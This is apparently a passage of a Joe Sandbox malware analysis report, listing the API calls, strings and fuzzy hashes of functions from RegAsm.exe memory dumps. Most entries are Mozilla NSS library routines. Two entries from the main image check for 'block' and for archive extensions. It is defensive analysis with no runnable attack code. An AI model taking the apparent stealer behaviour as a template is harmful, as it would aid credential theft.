Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: f0fde3131ec2feb2ed2b6a2b8d3a8df8052810121f9b6b520c191456e597ddd5
Instruction ID: 24e0d1b27b59a59d119b0913933ffb1ee5ae8456d3d85bc5b4c8c07782ee89fb
Opcode Fuzzy Hash: f0fde3131ec2feb2ed2b6a2b8d3a8df8052810121f9b6b520c191456e597ddd5
Instruction Fuzzy Hash: 0DF1ADB5D01208EFDF10DF64D848B99BBB4BF0A318F194268EC45A7711E731E999CBA1

Function 6CA76CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA76910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CA76943
Part of subcall function 6CA76910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CA76957
Part of subcall function 6CA76910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CA76972
Part of subcall function 6CA76910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CA76983
Part of subcall function 6CA76910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CA769AA
Part of subcall function 6CA76910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CA769BE
Part of subcall function 6CA76910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CA769D2
Part of subcall function 6CA76910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CA769DF
Part of subcall function 6CA76910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CA76A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA76D8C
free.MOZGLUE(00000000), ref: 6CA76DC5
free.MOZGLUE(?), ref: 6CA76DD6
free.MOZGLUE(?), ref: 6CA76DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA76E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA76E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA76E72
free.MOZGLUE(?), ref: 6CA76EA7
free.MOZGLUE(?), ref: 6CA76EC4
free.MOZGLUE(?), ref: 6CA76ED5
free.MOZGLUE(00000000), ref: 6CA76EE3
free.MOZGLUE(?), ref: 6CA76EF4
free.MOZGLUE(?), ref: 6CA76F08
free.MOZGLUE(00000000), ref: 6CA76F35
free.MOZGLUE(?), ref: 6CA76F44
free.MOZGLUE(?), ref: 6CA76F5B
free.MOZGLUE(00000000), ref: 6CA76F65

Part of subcall function 6CA76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA7781D,00000000,6CA6BE2C,?,6CA76B1D,?,?,?,?,00000000,00000000,6CA7781D), ref: 6CA76C40
Part of subcall function 6CA76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA7781D,?,6CA6BE2C,?), ref: 6CA76C58
Part of subcall function 6CA76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA7781D), ref: 6CA76C6F
Part of subcall function 6CA76C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA76C84
Part of subcall function 6CA76C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA76C96
Part of subcall function 6CA76C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA76CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA76F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA76FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CA76FF4

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 44b3fea9091d0ab1d3f26b331176fd27fb892c9f659e0be39f5c9101617b9e1b
Instruction ID: 6463a1b5ef3332c77916e7db4f10694de1e1ed8197ef24501d6d8c459986bd5f
Opcode Fuzzy Hash: 44b3fea9091d0ab1d3f26b331176fd27fb892c9f659e0be39f5c9101617b9e1b
Instruction Fuzzy Hash: 82B172B8E012099FDF20DBA5D984B9EBBB4BF09358F180124E815E7701E735E998CB71

Function 6CA74C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA74C4C
EnterCriticalSection.KERNEL32(?), ref: 6CA74C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CA74CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74DB7

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207AD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207CD
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9B204A), ref: 6CA207D6
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9B204A), ref: 6CA207E4
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,6C9B204A), ref: 6CA20864
Part of subcall function 6CA207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA20880
Part of subcall function 6CA207A0: TlsSetValue.KERNEL32(00000000,?,?,6C9B204A), ref: 6CA208CB
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208D7
Part of subcall function 6CA207A0: TlsGetValue.KERNEL32(?,?,6C9B204A), ref: 6CA208FB

TlsGetValue.KERNEL32 ref: 6CA74DD7
EnterCriticalSection.KERNEL32(?), ref: 6CA74DEC
PR_Unlock.NSS3(?), ref: 6CA74E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CA74E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA74E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CA74E71
free.MOZGLUE(00000000), ref: 6CA74E7A
PR_Unlock.NSS3(?), ref: 6CA74EA2
TlsGetValue.KERNEL32 ref: 6CA74EC1
EnterCriticalSection.KERNEL32(?), ref: 6CA74ED6
PR_Unlock.NSS3(?), ref: 6CA74F01
free.MOZGLUE(00000000), ref: 6CA74F2A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 2c777b7f8593149f298da4b3444d704c27138784840f8b9f0d476303362aaded
Instruction ID: a042330113d0fcc0fe6fa7063dd4fbe5438203dc0a6b0d59b7a4b1c2fde283bd
Opcode Fuzzy Hash: 2c777b7f8593149f298da4b3444d704c27138784840f8b9f0d476303362aaded
Instruction Fuzzy Hash: 1FB1E4B9A006059FDB10EF68D944BAA77B8FF0A318F094124ED1597B41E734E9A4CFE1

Function 6CAC6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CAC6BF7), ref: 6CAC6EB6

Part of subcall function 6CA21240: TlsGetValue.KERNEL32(00000040,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21267
Part of subcall function 6CA21240: EnterCriticalSection.KERNEL32(?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA2127C
Part of subcall function 6CA21240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21291
Part of subcall function 6CA21240: PR_Unlock.NSS3(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA212A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CB6FC0A,6CAC6BF7), ref: 6CAC6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CAC6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CAC6EFC
PR_NewLock.NSS3 ref: 6CAC6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CAC6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CAC6BF7), ref: 6CAC6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CAC6BF7), ref: 6CAC6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CAC6BF7), ref: 6CAC6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CAC6BF7), ref: 6CAC6FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6CAC6FF8
# SSL/TLS secrets log file, generated by NSS, xrefs: 6CAC6EF7
SSLKEYLOGFILE, xrefs: 6CAC6EB1
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CAC6FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CAC6F4F
SSLFORCELOCKS, xrefs: 6CAC6F2B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 7745eec6e53f4703a88bab77f29e8212be1b9f851498d10e4b3af4ca19a40b90
Instruction ID: a481dfc2bdb77c7f0272fee4bcaf8a6a909bb49048803a83bf33b73000e286a7
Opcode Fuzzy Hash: 7745eec6e53f4703a88bab77f29e8212be1b9f851498d10e4b3af4ca19a40b90
Instruction Fuzzy Hash: D0A1F7B2B559A087E7108A3CDE0175836A5AF97329F5C4365E831C7FE9DB3598C08383

Function 6CA45DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA45DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CA45E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6CA45E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6CA45E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CA45EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CA45ED9
SECKEY_SignatureLen.NSS3(?), ref: 6CA45F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CA45F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA45F89
free.MOZGLUE(?), ref: 6CA45FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA45FB6
free.MOZGLUE(00000000), ref: 6CA45FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA4600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA46079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA46084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA46094

Strings

, xrefs: 6CA45EEB

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: e869bc8764c21ed0428b0ad7a7fc52726ba83f7d850d88432d642c12bc8a1632
Instruction ID: 1b1fe70a20b2a9def7bdd7a3e593abe1b1764bd7f57e25e802b0eed968f39f3c
Opcode Fuzzy Hash: e869bc8764c21ed0428b0ad7a7fc52726ba83f7d850d88432d642c12bc8a1632
Instruction Fuzzy Hash: E781F4B1E002059BDB10CF64DD81BAE77B5AF45318F18C128E91AE7791E731E998CBD2

Function 6CA66D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CA66D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA66DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA66DC3

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA66DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA66DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA66E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CA66E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CA66E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CA66EB9

Strings

*pulDigestLen = 0x%x, xrefs: 6CA66EB4
C_Digest, xrefs: 6CA66D81
(CK_INVALID_HANDLE), xrefs: 6CA66DBC
ulDataLen = %d, xrefs: 6CA66E0E
pData = 0x%p, xrefs: 6CA66DF5
hSession = 0x%x, xrefs: 6CA66D9E, 6CA66DAE
pulDigestLen = 0x%p, xrefs: 6CA66E42
pDigest = 0x%p, xrefs: 6CA66E27

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: b76eece5418b03efba3109890f8973128d1184f84cafefce8d3728e1361136a3
Instruction ID: c7fb47f3fa6e2f976455591f819cd8e1923cdc90ba85ec6e73408e8a8a302d98
Opcode Fuzzy Hash: b76eece5418b03efba3109890f8973128d1184f84cafefce8d3728e1361136a3
Instruction Fuzzy Hash: 0341C335A01094EFDB009F55EE49F8A3BB5AF87319F488024E90897F11DB3098ACCB92

Function 6CA69C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6CA69C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA69C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA69CA3

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA69CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CA69CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA69CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA69D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CA69D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CA69D42

Strings

C_LoginUser, xrefs: 6CA69C61
ulUsernameLen = %d, xrefs: 6CA69D3D
ulPinLen = %d, xrefs: 6CA69D0B
(CK_INVALID_HANDLE), xrefs: 6CA69C9C
pPin = 0x%p, xrefs: 6CA69CF0
hSession = 0x%x, xrefs: 6CA69C7E, 6CA69C8E
pUsername = 0x%p, xrefs: 6CA69D24
userType = 0x%x, xrefs: 6CA69CD5

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 21054ceb7411466611250c64997cbcb795f243efb754e400cad708ac5ac2cbe4
Instruction ID: 38b3df216a0dd2a27933d16667ff4327b6015cef18798730025e39a98276f5d5
Opcode Fuzzy Hash: 21054ceb7411466611250c64997cbcb795f243efb754e400cad708ac5ac2cbe4
Instruction Fuzzy Hash: 4041B475A41194EFDB009F65EF48A9E3BB5AF4731DF488024F50867E11DB30896CDB92

Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
ExitProcess.KERNEL32 ref: 004139E2
strtok_s.MSVCRT ref: 004139F3

Strings

block, xrefs: 004139CB
DwA, xrefs: 004139EC, 004139EF

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: DwA$block
API String ID: 3407564107-4170876926
Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,771A83C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(771A83C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(771A83C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(771A83C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(771A83C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(771A83C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(771A83C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(771A83C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(771A83C0,.tgz), ref: 0041B8FB

Strings

.gz, xrefs: 0041B8E9
.tgz, xrefs: 0041B8F5
.zip, xrefs: 0041B8AD
.arc, xrefs: 0041B8C5
.zoo, xrefs: 0041B8B9
.lzh, xrefs: 0041B8D1
.arj, xrefs: 0041B8DD

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 6CB49C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6CB49C70
PR_NewLock.NSS3 ref: 6CB49C85

Part of subcall function 6CAF98D0: calloc.MOZGLUE(00000001,00000084,6CA20936,00000001,?,6CA2102C), ref: 6CAF98E5

PR_NewCondVar.NSS3(00000000), ref: 6CB49C96

Part of subcall function 6CA1BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA221BC), ref: 6CA1BB8C

PR_NewLock.NSS3 ref: 6CB49CA9

Part of subcall function 6CAF98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CAF9946
Part of subcall function 6CAF98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9B16B7,00000000), ref: 6CAF994E
Part of subcall function 6CAF98D0: free.MOZGLUE(00000000), ref: 6CAF995E

PR_NewLock.NSS3 ref: 6CB49CB9
PR_NewLock.NSS3 ref: 6CB49CC9
PR_NewCondVar.NSS3(00000000), ref: 6CB49CDA

Part of subcall function 6CA1BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA1BBEB
Part of subcall function 6CA1BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA1BBFB
Part of subcall function 6CA1BB80: GetLastError.KERNEL32 ref: 6CA1BC03
Part of subcall function 6CA1BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA1BC19
Part of subcall function 6CA1BB80: free.MOZGLUE(00000000), ref: 6CA1BC22

PR_NewCondVar.NSS3(?), ref: 6CB49CF0
PR_NewPollableEvent.NSS3 ref: 6CB49D03

Part of subcall function 6CB3F3B0: PR_CallOnce.NSS3(6CB914B0,6CB3F510), ref: 6CB3F3E6
Part of subcall function 6CB3F3B0: PR_CreateIOLayerStub.NSS3(6CB9006C), ref: 6CB3F402
Part of subcall function 6CB3F3B0: PR_Malloc.NSS3(00000004), ref: 6CB3F416
Part of subcall function 6CB3F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CB3F42D
Part of subcall function 6CB3F3B0: PR_SetSocketOption.NSS3(?), ref: 6CB3F455
Part of subcall function 6CB3F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CB3F473

